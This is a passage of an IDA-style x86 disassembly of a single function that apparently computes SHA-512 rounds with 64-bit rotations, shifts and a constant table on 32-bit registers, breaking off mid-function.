var_B4 = dword ptr -0B4h
var_B0 = dword ptr -0B0h
var_AC = dword ptr -0ACh
var_A8 = dword ptr -0A8h
var_A4 = dword ptr -0A4h
var_A0 = dword ptr -0A0h
var_9C = dword ptr -9Ch
var_98 = dword ptr -98h
var_94 = dword ptr -94h
var_90 = dword ptr -90h
var_8C = dword ptr -8Ch
var_88 = dword ptr -88h
var_84 = dword ptr -84h
var_80 = dword ptr -80h
var_7C = dword ptr -7Ch
var_78 = dword ptr -78h
var_74 = dword ptr -74h
var_70 = dword ptr -70h
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 4
sub esp, 160h
mov eax, [esp+160h+arg_0]
mov edx, [eax+54h]
push ebx
mov [esp+164h+var_FC], edx
mov edx, [eax+5Ch]
push ebp
push esi
mov [esp+16Ch+var_10C], edx
mov edx, [eax+64h]
push edi
lea esi, [eax+10h]
mov [esp+170h+var_4], esi
mov ecx, 10h
lea edi, [esp+170h+var_158]
rep movsd
mov ecx, [eax+50h]
mov [esp+170h+var_100], ecx
mov ecx, [eax+58h]
mov [esp+170h+var_110], ecx
mov ecx, [eax+60h]
mov [esp+170h+var_108], ecx
mov ecx, [eax+68h]
mov [esp+170h+var_104], edx
mov edx, [eax+6Ch]
mov [esp+170h+var_B8], ecx
mov ecx, [eax+70h]
mov [esp+170h+var_B4], edx
mov edx, [eax+74h]
mov [esp+170h+var_A8], ecx
mov ecx, [eax+78h]
mov [esp+170h+var_A4], edx
mov edx, [eax+7Ch]
mov [esp+170h+var_D0], ecx
mov ecx, [eax+80h]
mov [esp+170h+var_CC], edx
mov edx, [eax+84h]
mov esi, [eax+0C4h]
mov [esp+170h+var_D8], ecx
mov ecx, [eax+88h]
mov [esp+170h+var_D4], edx
mov edx, [eax+8Ch]
mov [esp+170h+var_118], ecx
mov ecx, [eax+90h]
mov [esp+170h+var_114], edx
mov edx, [eax+94h]
mov [esp+170h+var_C8], ecx
mov ecx, [eax+98h]
mov [esp+170h+var_C4], edx
mov edx, [eax+9Ch]
mov [esp+170h+var_F0], ecx
mov ecx, [eax+0A0h]
mov [esp+170h+var_EC], edx
mov edx, [eax+0A4h]
mov [esp+170h+var_E8], ecx
mov ecx, [eax+0A8h]
mov [esp+170h+var_E4], edx
mov edx, [eax+0ACh]
mov [esp+170h+var_F8], ecx
mov ecx, [eax+0B0h]
mov [esp+170h+var_F4], edx
mov edx, [eax+0B4h]
mov [esp+170h+var_B0], ecx
mov ecx, [eax+0B8h]
mov [esp+170h+var_AC], edx
mov edx, [eax+0BCh]
mov [esp+170h+var_C0], ecx
mov ecx, [eax+0C0h]
mov [esp+170h+var_BC], edx
mov edx, [eax+0C8h]
mov eax, [eax+0CCh]
xor edi, edi
mov [esp+170h+var_15C], edi
mov [esp+170h+var_A0], ecx
mov [esp+170h+var_9C], esi
mov [esp+170h+var_E0], edx
mov [esp+170h+var_DC], eax
jmp short loc_41456E
; ---------------------------------------------------------------------------
align 10h
loc_414560: ; CODE XREF: sub_4143D0+2680�j
mov ecx, [esp+170h+var_A0]
mov esi, [esp+170h+var_9C]
loc_41456E: ; CODE XREF: sub_4143D0+18A�j
test edi, edi
mov eax, [esp+170h+var_138]
mov edx, [esp+170h+var_134]
jz loc_414658
mov edi, ecx
xor eax, eax
mov ebx, esi
shrd edi, ebx, 13h
or eax, edi
mov ebp, ecx
mov edx, ecx
mov edi, esi
shld esi, ebp, 3
shr ebx, 13h
shl edx, 0Dh
or edx, ebx
add ebp, ebp
xor ebx, ebx
or ebx, esi
mov esi, [esp+170h+var_9C]
shrd ecx, esi, 6
add ebp, ebp
add ebp, ebp
shr edi, 1Dh
or edi, ebp
xor eax, edi
xor eax, ecx
mov ecx, [esp+170h+var_10C]
xor edx, ebx
mov [esp+170h+var_160], eax
mov eax, [esp+170h+var_110]
mov ebp, ecx
mov ebx, eax
shrd ebx, ebp, 8
shr esi, 6
xor edx, esi
xor edi, edi
or edi, ebx
mov esi, eax
mov ebx, eax
shrd eax, ecx, 1
shl esi, 18h
shr ebp, 8
or esi, ebp
shr ecx, 1
xor ebp, ebp
or ebp, eax
mov eax, [esp+170h+var_10C]
shl ebx, 1Fh
or ebx, ecx
mov ecx, [esp+170h+var_110]
shrd ecx, eax, 7
shr eax, 7
xor edi, ebp
xor esi, ebx
xor esi, eax
mov eax, [esp+170h+arg_0]
xor edi, ecx
mov ecx, [esp+170h+var_160]
add ecx, edi
adc edx, esi
add ecx, [esp+170h+var_100]
adc edx, [esp+170h+var_FC]
add ecx, [esp+170h+var_F0]
adc edx, [esp+170h+var_EC]
mov [eax+50h], ecx
mov [eax+54h], edx
mov eax, edx
mov edx, [esp+170h+var_134]
mov [esp+170h+var_FC], eax
mov [esp+170h+var_54], eax
mov eax, [esp+170h+var_138]
mov [esp+170h+var_100], ecx
mov [esp+170h+var_58], ecx
jmp short loc_41466E
; ---------------------------------------------------------------------------
loc_414658: ; CODE XREF: sub_4143D0+1A8�j
mov ecx, [esp+170h+var_100]
mov [esp+170h+var_58], ecx
mov ecx, [esp+170h+var_FC]
mov [esp+170h+var_54], ecx
loc_41466E: ; CODE XREF: sub_4143D0+286�j
mov ebx, edx
mov esi, edx
xor edi, edi
mov ecx, eax
shld ebx, ecx, 17h
or edi, ebx
shl ecx, 17h
xor ebx, ebx
shr esi, 9
or esi, ecx
mov ebp, eax
shrd ebp, edx, 12h
or ebx, ebp
mov ebp, [esp+170h+var_134]
xor esi, ebx
shr edx, 12h
mov ecx, eax
shl ecx, 0Eh
or ecx, edx
xor edi, ecx
xor ecx, ecx
mov ebx, eax
shrd ebx, ebp, 0Eh
or ecx, ebx
xor esi, ecx
mov ecx, [esp+170h+var_134]
shr ebp, 0Eh
mov edx, eax
shl edx, 12h
or edx, ebp
mov ebp, [esp+170h+var_130]
xor edi, edx
and ebp, eax
mov edx, eax
mov eax, [esp+170h+var_12C]
and eax, ecx
mov ebx, ecx
mov ecx, [esp+170h+var_11C]
not edx
and edx, [esp+170h+var_128]
not ebx
and ebx, [esp+170h+var_124]
xor edx, ebp
xor ebx, eax
mov eax, [esp+170h+var_15C]
add esi, edx
adc edi, ebx
add esi, ds:dword_41F950[eax*8]
adc edi, ds:dword_41F954[eax*8]
add esi, [esp+170h+var_58]
mov eax, [esp+170h+var_120]
adc edi, [esp+170h+var_54]
add eax, esi
adc ecx, edi
add [esp+170h+var_140], eax
mov [esp+170h+var_11C], ecx
mov [esp+170h+var_120], eax
adc [esp+170h+var_13C], ecx
mov eax, [esp+170h+var_154]
mov ecx, [esp+170h+var_158]
mov edx, ecx
mov esi, ecx
mov ebx, eax
shrd edx, ebx, 1Ch
xor edi, edi
or edi, edx
mov ebp, eax
shld ebp, ecx, 1Eh
shr ebx, 1Ch
shl esi, 4
or esi, ebx
mov edx, eax
shl ecx, 1Eh
shr edx, 2
xor ebx, ebx
or edx, ecx
or ebx, ebp
mov ecx, eax
xor edi, edx
xor esi, ebx
shr ecx, 7
mov ebx, [esp+170h+var_158]
mov ebp, eax
shld ebp, ebx, 19h
shl ebx, 19h
or ecx, ebx
xor edx, edx
or edx, ebp
mov ebp, [esp+170h+var_14C]
xor edi, ecx
mov ecx, [esp+170h+var_150]
xor esi, edx
mov edx, [esp+170h+var_158]
mov ebx, ecx
xor ebx, edx
and ebx, [esp+170h+var_148]
and ecx, edx
mov edx, [esp+170h+var_14C]
xor ebp, eax
and ebp, [esp+170h+var_144]
and edx, eax
xor ebx, ecx
xor ebp, edx
add edi, ebx
adc esi, ebp
add [esp+170h+var_120], edi
adc [esp+170h+var_11C], esi
cmp [esp+170h+var_15C], 0
jz loc_414884
mov eax, [esp+170h+var_E0]
mov ecx, [esp+170h+var_DC]
mov ebx, ecx
mov edi, eax
shrd edi, ebx, 13h
xor esi, esi
or esi, edi
mov edi, ecx
shr ebx, 13h
mov edx, eax
mov ebp, eax
shld ecx, ebp, 3
shl edx, 0Dh
or edx, ebx
xor ebx, ebx
or ebx, ecx
mov ecx, [esp+170h+var_DC]
shrd eax, ecx, 6
add ebp, ebp
add ebp, ebp
add ebp, ebp
shr edi, 1Dh
or edi, ebp
xor esi, edi
xor esi, eax
mov eax, [esp+170h+var_108]
xor edx, ebx
shr ecx, 6
xor edx, ecx
mov ecx, [esp+170h+var_104]
mov ebp, ecx
mov ebx, eax
shrd ebx, ebp, 8
xor edi, edi
or edi, ebx
mov [esp+170h+var_160], esi
mov esi, eax
mov ebx, eax
shrd eax, ecx, 1
shl esi, 18h
shr ebp, 8
or esi, ebp
shr ecx, 1
xor ebp, ebp
or ebp, eax
mov eax, [esp+170h+var_108]
shl ebx, 1Fh
or ebx, ecx
mov ecx, [esp+170h+var_104]
shrd eax, ecx, 7
shr ecx, 7
xor esi, ebx
xor edi, ebp
xor esi, ecx
mov ecx, [esp+170h+var_160]
xor edi, eax
mov eax, [esp+170h+arg_0]
add ecx, edi
adc edx, esi
add ecx, [esp+170h+var_E8]
adc edx, [esp+170h+var_E4]
add ecx, [esp+170h+var_110]
adc edx, [esp+170h+var_10C]
mov [eax+58h], ecx
mov [eax+5Ch], edx
mov eax, edx
mov [esp+170h+var_110], ecx
mov [esp+170h+var_10C], eax
mov [esp+170h+var_28], ecx
jmp short loc_414893
; ---------------------------------------------------------------------------
loc_414884: ; CODE XREF: sub_4143D0+3D5�j
mov edx, [esp+170h+var_110]
mov eax, [esp+170h+var_10C]
mov [esp+170h+var_28], edx
loc_414893: ; CODE XREF: sub_4143D0+4B2�j
mov ecx, [esp+170h+var_13C]
mov ebx, ecx
mov [esp+170h+var_24], eax
mov eax, [esp+170h+var_140]
mov edx, ecx
xor esi, esi
shr edx, 9
mov edi, eax
shld ebx, edi, 17h
or esi, ebx
shl edi, 17h
or edx, edi
xor ebx, ebx
mov ebp, eax
shrd ebp, ecx, 12h
or ebx, ebp
mov ebp, [esp+170h+var_13C]
xor edx, ebx
shr ecx, 12h
mov edi, eax
shl edi, 0Eh
or edi, ecx
xor esi, edi
xor edi, edi
mov ebx, eax
shrd ebx, ebp, 0Eh
or edi, ebx
xor edx, edi
shr ebp, 0Eh
mov ecx, eax
shl ecx, 12h
or ecx, ebp
xor esi, ecx
mov ecx, [esp+170h+var_13C]
mov ebx, ecx
and ecx, [esp+170h+var_134]
mov edi, eax
and eax, [esp+170h+var_138]
not ebx
and ebx, [esp+170h+var_12C]
not edi
and edi, [esp+170h+var_130]
xor ebx, ecx
mov ecx, [esp+170h+var_124]
xor edi, eax
mov eax, [esp+170h+var_15C]
add edx, edi
adc esi, ebx
add edx, ds:dword_41F958[eax*8]
adc esi, ds:dword_41F95C[eax*8]
add edx, [esp+170h+var_28]
mov eax, [esp+170h+var_128]
adc esi, [esp+170h+var_24]
add eax, edx
adc ecx, esi
add [esp+170h+var_148], eax
mov [esp+170h+var_124], ecx
mov [esp+170h+var_128], eax
adc [esp+170h+var_144], ecx
mov eax, [esp+170h+var_11C]
mov ecx, [esp+170h+var_120]
mov edx, ecx
mov ebx, eax
shrd edx, ebx, 1Ch
mov esi, ecx
xor edi, edi
or edi, edx
mov ebp, eax
shld ebp, ecx, 1Eh
shr ebx, 1Ch
shl esi, 4
or esi, ebx
mov edx, eax
shl ecx, 1Eh
shr edx, 2
xor ebx, ebx
or edx, ecx
or ebx, ebp
xor edi, edx
xor esi, ebx
mov ecx, eax
mov ebx, [esp+170h+var_120]
xor edx, edx
mov ebp, eax
shld ebp, ebx, 19h
or edx, ebp
mov ebp, [esp+170h+var_154]
shl ebx, 19h
shr ecx, 7
or ecx, ebx
xor esi, edx
mov edx, [esp+170h+var_158]
xor edi, ecx
mov ecx, [esp+170h+var_120]
mov ebx, edx
xor ebx, ecx
and ebx, [esp+170h+var_150]
and edx, ecx
mov ecx, [esp+170h+var_154]
xor ebp, eax
and ebp, [esp+170h+var_14C]
and ecx, eax
xor ebx, edx
xor ebp, ecx
add edi, ebx
adc esi, ebp
add [esp+170h+var_128], edi
adc [esp+170h+var_124], esi
cmp [esp+170h+var_15C], 0
jz loc_414AAE
mov eax, [esp+170h+var_B8]
mov ecx, [esp+170h+var_B4]
mov ebx, ecx
mov edi, eax
shrd edi, ebx, 8
mov ebp, eax
shrd ebp, ecx, 1
xor esi, esi
or esi, edi
shr ecx, 1
mov edi, eax
mov edx, eax
shr ebx, 8
shl edi, 1Fh
or edi, ecx
mov ecx, [esp+170h+var_B4]
shrd eax, ecx, 7
shl edx, 18h
or edx, ebx
xor ebx, ebx
or ebx, ebp
xor esi, ebx
xor esi, eax
mov eax, [esp+170h+var_100]
xor edx, edi
shr ecx, 7
xor edx, ecx
mov ecx, [esp+170h+var_FC]
mov ebx, eax
mov ebp, ecx
shrd ebx, ebp, 13h
xor edi, edi
or edi, ebx
mov ebx, ecx
mov [esp+170h+var_160], esi
mov esi, eax
shld ecx, eax, 3
add eax, eax
add eax, eax
shl esi, 0Dh
shr ebp, 13h
or esi, ebp
add eax, eax
shr ebx, 1Dh
or ebx, eax
mov eax, [esp+170h+var_100]
xor ebp, ebp
or ebp, ecx
mov ecx, [esp+170h+var_FC]
shrd eax, ecx, 6
shr ecx, 6
xor esi, ebp
xor edi, ebx
xor esi, ecx
mov ecx, [esp+170h+var_160]
xor edi, eax
mov eax, [esp+170h+arg_0]
add ecx, edi
adc edx, esi
add ecx, [esp+170h+var_F8]
adc edx, [esp+170h+var_F4]
add ecx, [esp+170h+var_108]
adc edx, [esp+170h+var_104]
mov [eax+60h], ecx
mov [eax+64h], edx
mov eax, edx
mov [esp+170h+var_108], ecx
mov [esp+170h+var_104], eax
mov [esp+170h+var_70], ecx
jmp short loc_414ABD
; ---------------------------------------------------------------------------
loc_414AAE: ; CODE XREF: sub_4143D0+605�j
mov edx, [esp+170h+var_108]
mov eax, [esp+170h+var_104]
mov [esp+170h+var_70], edx
loc_414ABD: ; CODE XREF: sub_4143D0+6DC�j
mov ecx, [esp+170h+var_144]
mov ebx, ecx
mov [esp+170h+var_6C], eax
mov eax, [esp+170h+var_148]
mov edx, ecx
xor esi, esi
shr edx, 9
mov edi, eax
shld ebx, edi, 17h
or esi, ebx
shl edi, 17h
or edx, edi
xor ebx, ebx
mov ebp, eax
shrd ebp, ecx, 12h
or ebx, ebp
mov ebp, [esp+170h+var_144]
xor edx, ebx
shr ecx, 12h
mov edi, eax
shl edi, 0Eh
or edi, ecx
xor esi, edi
xor edi, edi
mov ebx, eax
shrd ebx, ebp, 0Eh
or edi, ebx
xor edx, edi
shr ebp, 0Eh
mov ecx, eax
shl ecx, 12h
or ecx, ebp
xor esi, ecx
mov ecx, [esp+170h+var_144]
mov ebx, ecx
and ecx, [esp+170h+var_13C]
mov edi, eax
and eax, [esp+170h+var_140]
not ebx
and ebx, [esp+170h+var_134]
not edi
and edi, [esp+170h+var_138]
xor ebx, ecx
mov ecx, [esp+170h+var_12C]
xor edi, eax
mov eax, [esp+170h+var_15C]
add edx, edi
adc esi, ebx
add edx, ds:dword_41F960[eax*8]
adc esi, ds:dword_41F964[eax*8]
add edx, [esp+170h+var_70]
mov eax, [esp+170h+var_130]
adc esi, [esp+170h+var_6C]
add eax, edx
adc ecx, esi
add [esp+170h+var_150], eax
mov [esp+170h+var_12C], ecx
mov [esp+170h+var_130], eax
adc [esp+170h+var_14C], ecx
mov eax, [esp+170h+var_124]
mov ecx, [esp+170h+var_128]
mov edx, ecx
mov ebx, eax
shrd edx, ebx, 1Ch
mov esi, ecx
xor edi, edi
or edi, edx
mov ebp, eax
shld ebp, ecx, 1Eh
shr ebx, 1Ch
shl esi, 4
or esi, ebx
mov edx, eax
shl ecx, 1Eh
shr edx, 2
xor ebx, ebx
or edx, ecx
or ebx, ebp
xor edi, edx
xor esi, ebx
mov ecx, eax
mov ebx, [esp+170h+var_128]
xor edx, edx
mov ebp, eax
shld ebp, ebx, 19h
or edx, ebp
mov ebp, [esp+170h+var_11C]
shl ebx, 19h
shr ecx, 7
or ecx, ebx
xor esi, edx
mov edx, [esp+170h+var_120]
xor edi, ecx
mov ecx, [esp+170h+var_128]
mov ebx, edx
xor ebx, ecx
and ebx, [esp+170h+var_158]
and edx, ecx
mov ecx, [esp+170h+var_11C]
xor ebp, eax
and ebp, [esp+170h+var_154]
and ecx, eax
xor ebx, edx
xor ebp, ecx
add edi, ebx
adc esi, ebp
add [esp+170h+var_130], edi
adc [esp+170h+var_12C], esi
cmp [esp+170h+var_15C], 0
jz loc_414CEA
mov eax, [esp+170h+var_A8]
mov ecx, [esp+170h+var_A4]
mov ebx, ecx
mov edi, eax
shrd edi, ebx, 8
mov ebp, eax
shrd ebp, ecx, 1
xor esi, esi
or esi, edi
shr ecx, 1
mov edi, eax
mov edx, eax
shr ebx, 8
shl edi, 1Fh
or edi, ecx
mov ecx, [esp+170h+var_A4]
shrd eax, ecx, 7
shl edx, 18h
or edx, ebx
xor ebx, ebx
or ebx, ebp
xor esi, ebx
xor esi, eax
mov eax, [esp+170h+var_110]
xor edx, edi
shr ecx, 7
xor edx, ecx
mov ecx, [esp+170h+var_10C]
mov ebx, eax
mov ebp, ecx
shrd ebx, ebp, 13h
xor edi, edi
or edi, ebx
mov ebx, ecx
mov [esp+170h+var_160], esi
mov esi, eax
shld ecx, eax, 3
add eax, eax
add eax, eax
shl esi, 0Dh
shr ebp, 13h
or esi, ebp
add eax, eax
shr ebx, 1Dh
or ebx, eax
mov eax, [esp+170h+var_110]
xor ebp, ebp
or ebp, ecx
mov ecx, [esp+170h+var_10C]
shrd eax, ecx, 6
shr ecx, 6
xor esi, ebp
xor edi, ebx
xor esi, ecx
mov ecx, [esp+170h+var_160]
xor edi, eax
mov eax, [esp+170h+arg_0]
add ecx, edi
adc edx, esi
add ecx, [esp+170h+var_B0]
adc edx, [esp+170h+var_AC]
add ecx, [esp+170h+var_B8]
adc edx, [esp+170h+var_B4]
mov [eax+68h], ecx
mov [eax+6Ch], edx
mov eax, edx
mov [esp+170h+var_B8], ecx
mov [esp+170h+var_B4], eax
mov [esp+170h+var_38], ecx
jmp short loc_414CFF
; ---------------------------------------------------------------------------
loc_414CEA: ; CODE XREF: sub_4143D0+82F�j
mov edx, [esp+170h+var_B8]
mov eax, [esp+170h+var_B4]
mov [esp+170h+var_38], edx
loc_414CFF: ; CODE XREF: sub_4143D0+918�j
mov ecx, [esp+170h+var_14C]
mov ebx, ecx
mov [esp+170h+var_34], eax
mov eax, [esp+170h+var_150]
xor esi, esi
mov edx, ecx
mov edi, eax
shld ebx, edi, 17h
or esi, ebx
shl edi, 17h
xor ebx, ebx
shr edx, 9
or edx, edi
mov ebp, eax
shrd ebp, ecx, 12h
or ebx, ebp
mov ebp, [esp+170h+var_14C]
xor edx, ebx
shr ecx, 12h
mov edi, eax
shl edi, 0Eh
or edi, ecx
xor esi, edi
mov ebx, eax
shrd ebx, ebp, 0Eh
xor edi, edi
or edi, ebx
xor edx, edi
shr ebp, 0Eh
mov ecx, eax
shl ecx, 12h
or ecx, ebp
mov ebp, [esp+170h+var_148]
xor esi, ecx
mov ecx, [esp+170h+var_14C]
and ebp, eax
mov edi, eax
mov eax, [esp+170h+var_144]
and eax, ecx
mov ebx, ecx
mov ecx, [esp+170h+var_134]
not ebx
and ebx, [esp+170h+var_13C]
not edi
and edi, [esp+170h+var_140]
xor ebx, eax
mov eax, [esp+170h+var_15C]
xor edi, ebp
add edx, edi
adc esi, ebx
add edx, ds:dword_41F968[eax*8]
adc esi, ds:dword_41F96C[eax*8]
add edx, [esp+170h+var_38]
mov eax, [esp+170h+var_138]
adc esi, [esp+170h+var_34]
add eax, edx
adc ecx, esi
add [esp+170h+var_158], eax
mov [esp+170h+var_134], ecx
mov [esp+170h+var_138], eax
adc [esp+170h+var_154], ecx
mov ecx, [esp+170h+var_130]
mov eax, [esp+170h+var_12C]
mov edx, ecx
mov ebx, eax
shrd edx, ebx, 1Ch
mov esi, ecx
mov ebp, eax
shld ebp, ecx, 1Eh
xor edi, edi
or edi, edx
shr ebx, 1Ch
shl esi, 4
or esi, ebx
mov edx, eax
shr edx, 2
shl ecx, 1Eh
xor ebx, ebx
or edx, ecx
or ebx, ebp
xor edi, edx
xor esi, ebx
mov ebx, [esp+170h+var_130]
xor edx, edx
mov ebp, eax
shld ebp, ebx, 19h
or edx, ebp
mov ebp, [esp+170h+var_124]
shl ebx, 19h
xor esi, edx
mov edx, [esp+170h+var_128]
mov ecx, eax
shr ecx, 7
or ecx, ebx
xor edi, ecx
mov ecx, [esp+170h+var_130]
mov ebx, edx
xor ebx, ecx
and ebx, [esp+170h+var_120]
and edx, ecx
mov ecx, [esp+170h+var_124]
xor ebp, eax
and ebp, [esp+170h+var_11C]
and ecx, eax
xor ebx, edx
xor ebp, ecx
add edi, ebx
adc esi, ebp
add [esp+170h+var_138], edi
adc [esp+170h+var_134], esi
cmp [esp+170h+var_15C], 0
jz loc_414F30
mov eax, [esp+170h+var_D0]
mov ecx, [esp+170h+var_CC]
mov ebx, ecx
mov edi, eax
shrd edi, ebx, 8
mov ebp, eax
shrd ebp, ecx, 1
xor esi, esi
or esi, edi
shr ecx, 1
mov edi, eax
mov edx, eax
shr ebx, 8
shl edi, 1Fh
or edi, ecx
mov ecx, [esp+170h+var_CC]
shrd eax, ecx, 7
shl edx, 18h
or edx, ebx
xor ebx, ebx
or ebx, ebp
xor esi, ebx
xor esi, eax
mov eax, [esp+170h+var_108]
xor edx, edi
shr ecx, 7
xor edx, ecx
mov ecx, [esp+170h+var_104]
mov ebx, eax
mov ebp, ecx
shrd ebx, ebp, 13h
xor edi, edi
or edi, ebx
mov ebx, ecx
mov [esp+170h+var_160], esi
mov esi, eax
shld ecx, eax, 3
add eax, eax
add eax, eax
shl esi, 0Dh
shr ebp, 13h
or esi, ebp
add eax, eax
shr ebx, 1Dh
or ebx, eax
mov eax, [esp+170h+var_108]
xor ebp, ebp
or ebp, ecx
mov ecx, [esp+170h+var_104]
shrd eax, ecx, 6
shr ecx, 6
xor esi, ebp
xor edi, ebx
xor esi, ecx
mov ecx, [esp+170h+var_160]
xor edi, eax
mov eax, [esp+170h+arg_0]
add ecx, edi
adc edx, esi
add ecx, [esp+170h+var_C0]
adc edx, [esp+170h+var_BC]
add ecx, [esp+170h+var_A8]
adc edx, [esp+170h+var_A4]
mov [eax+70h], ecx
mov [eax+74h], edx
mov eax, edx
mov [esp+170h+var_A8], ecx
mov [esp+170h+var_A4], eax
mov [esp+170h+var_88], ecx
jmp short loc_414F45
; ---------------------------------------------------------------------------
loc_414F30: ; CODE XREF: sub_4143D0+A75�j
mov edx, [esp+170h+var_A8]
mov eax, [esp+170h+var_A4]
mov [esp+170h+var_88], edx
loc_414F45: ; CODE XREF: sub_4143D0+B5E�j
mov ecx, [esp+170h+var_154]
mov [esp+170h+var_84], eax
mov eax, [esp+170h+var_158]
mov ebx, ecx
xor esi, esi
mov edi, eax
shld ebx, edi, 17h
or esi, ebx
shl edi, 17h
mov edx, ecx
shr edx, 9
or edx, edi
mov ebp, eax
shrd ebp, ecx, 12h
xor ebx, ebx
or ebx, ebp
mov ebp, [esp+170h+var_154]
xor edx, ebx
shr ecx, 12h
mov edi, eax
shl edi, 0Eh
or edi, ecx
xor esi, edi
mov ebx, eax
shrd ebx, ebp, 0Eh
xor edi, edi
or edi, ebx
xor edx, edi
mov ecx, eax
shl ecx, 12h
shr ebp, 0Eh
or ecx, ebp
mov ebp, [esp+170h+var_150]
xor esi, ecx
mov ecx, [esp+170h+var_154]
and ebp, eax
mov edi, eax
mov eax, [esp+170h+var_14C]
and eax, ecx
mov ebx, ecx
mov ecx, [esp+170h+var_13C]
not edi
and edi, [esp+170h+var_148]
not ebx
and ebx, [esp+170h+var_144]
xor edi, ebp
xor ebx, eax
mov eax, [esp+170h+var_15C]
add edx, edi
adc esi, ebx
add edx, ds:dword_41F970[eax*8]
mov edi, [esp+170h+var_12C]
adc esi, ds:dword_41F974[eax*8]
add edx, [esp+170h+var_88]
mov eax, [esp+170h+var_140]
adc esi, [esp+170h+var_84]
add eax, edx
adc ecx, esi
add [esp+170h+var_120], eax
mov esi, [esp+170h+var_130]
mov [esp+170h+var_140], eax
adc [esp+170h+var_11C], ecx
mov [esp+170h+var_13C], ecx
mov ecx, [esp+170h+var_138]
mov eax, esi
xor eax, ecx
mov [esp+170h+var_98], eax
mov eax, [esp+170h+var_134]
mov edx, edi
xor edx, eax
mov [esp+170h+var_94], edx
mov edx, esi
and edx, ecx
mov [esp+170h+var_90], edx
mov edx, edi
and edx, eax
mov [esp+170h+var_8C], edx
mov edx, ecx
xor esi, esi
shl edx, 4
mov edi, ecx
mov ebx, eax
shrd edi, ebx, 1Ch
shr ebx, 1Ch
or edx, ebx
or esi, edi
mov ebp, eax
shld ebp, ecx, 1Eh
xor ebx, ebx
shl ecx, 1Eh
or ebx, ebp
mov edi, eax
xor edx, ebx
mov ebx, [esp+170h+var_138]
shr edi, 2
or edi, ecx
mov ecx, eax
shld eax, ebx, 19h
xor esi, edi
shr ecx, 7
xor edi, edi
or edi, eax
mov eax, [esp+170h+var_98]
and eax, [esp+170h+var_128]
shl ebx, 19h
xor eax, [esp+170h+var_90]
or ecx, ebx
xor esi, ecx
mov ecx, [esp+170h+var_94]
and ecx, [esp+170h+var_124]
xor edx, edi
xor ecx, [esp+170h+var_8C]
add esi, eax
adc edx, ecx
add [esp+170h+var_140], esi
adc [esp+170h+var_13C], edx
cmp [esp+170h+var_15C], 0
jz loc_4151B2
mov eax, [esp+170h+var_B8]
mov ecx, [esp+170h+var_B4]
mov ebx, ecx
mov edi, eax
shrd edi, ebx, 13h
xor esi, esi
or esi, edi
mov edi, ecx
shr ebx, 13h
mov edx, eax
mov ebp, eax
shld ecx, ebp, 3
shl edx, 0Dh
or edx, ebx
xor ebx, ebx
or ebx, ecx
mov ecx, [esp+170h+var_B4]
shrd eax, ecx, 6
add ebp, ebp
add ebp, ebp
add ebp, ebp
shr edi, 1Dh
or edi, ebp
xor esi, edi
xor esi, eax
mov eax, [esp+170h+var_D8]
xor edx, ebx
shr ecx, 6
xor edx, ecx
mov ecx, [esp+170h+var_D4]
mov ebp, ecx
mov ebx, eax
shrd ebx, ebp, 8
xor edi, edi
or edi, ebx
mov [esp+170h+var_160], esi
mov esi, eax
mov ebx, eax
shrd eax, ecx, 1
shl esi, 18h
shr ebp, 8
or esi, ebp
shr ecx, 1
xor ebp, ebp
or ebp, eax
mov eax, [esp+170h+var_D8]
shl ebx, 1Fh
or ebx, ecx
mov ecx, [esp+170h+var_D4]
shrd eax, ecx, 7
shr ecx, 7
xor esi, ebx
xor edi, ebp
xor esi, ecx
mov ecx, [esp+170h+var_160]
xor edi, eax
mov eax, [esp+170h+arg_0]
add ecx, edi
adc edx, esi
add ecx, [esp+170h+var_D0]
adc edx, [esp+170h+var_CC]
add ecx, [esp+170h+var_A0]
adc edx, [esp+170h+var_9C]
mov [eax+78h], ecx
mov [eax+7Ch], edx
mov eax, edx
mov [esp+170h+var_D0], ecx
mov [esp+170h+var_CC], eax
mov [esp+170h+var_60], ecx
jmp short loc_4151C7
; ---------------------------------------------------------------------------
loc_4151B2: ; CODE XREF: sub_4143D0+CEB�j
mov edx, [esp+170h+var_D0]
mov eax, [esp+170h+var_CC]
mov [esp+170h+var_60], edx
loc_4151C7: ; CODE XREF: sub_4143D0+DE0�j
mov ecx, [esp+170h+var_11C]
mov ebx, ecx
mov [esp+170h+var_5C], eax
mov eax, [esp+170h+var_120]
xor esi, esi
mov edx, ecx
mov edi, eax
shld ebx, edi, 17h
or esi, ebx
shl edi, 17h
xor ebx, ebx
shr edx, 9
or edx, edi
mov ebp, eax
shrd ebp, ecx, 12h
or ebx, ebp
mov ebp, [esp+170h+var_11C]
xor edx, ebx
shr ecx, 12h
mov edi, eax
shl edi, 0Eh
or edi, ecx
xor esi, edi
mov ebx, eax
shrd ebx, ebp, 0Eh
shr ebp, 0Eh
xor edi, edi
or edi, ebx
xor edx, edi
mov ecx, eax
shl ecx, 12h
or ecx, ebp
mov ebp, [esp+170h+var_158]
xor esi, ecx
mov ecx, [esp+170h+var_11C]
and ebp, eax
mov edi, eax
mov eax, [esp+170h+var_154]
and eax, ecx
mov ebx, ecx
mov ecx, [esp+170h+var_148]
not ebx
and ebx, [esp+170h+var_14C]
not edi
and edi, [esp+170h+var_150]
xor ebx, eax
mov eax, [esp+170h+var_15C]
xor edi, ebp
add edx, edi
adc esi, ebx
add edx, ds:dword_41F978[eax*8]
adc esi, ds:dword_41F97C[eax*8]
add edx, [esp+170h+var_60]
mov eax, [esp+170h+var_128]
adc esi, [esp+170h+var_5C]
add ecx, edx
mov edx, [esp+170h+var_144]
adc edx, esi
add eax, ecx
adc [esp+170h+var_124], edx
mov [esp+170h+var_148], ecx
mov ecx, [esp+170h+var_140]
mov [esp+170h+var_144], edx
mov edx, [esp+170h+var_13C]
mov ebx, ecx
mov ebp, edx
shrd ebx, ebp, 1Ch
xor edi, edi
or edi, ebx
mov esi, ecx
mov ebx, edx
shld edx, ecx, 1Eh
shr ebp, 1Ch
shl esi, 4
or esi, ebp
shr ebx, 2
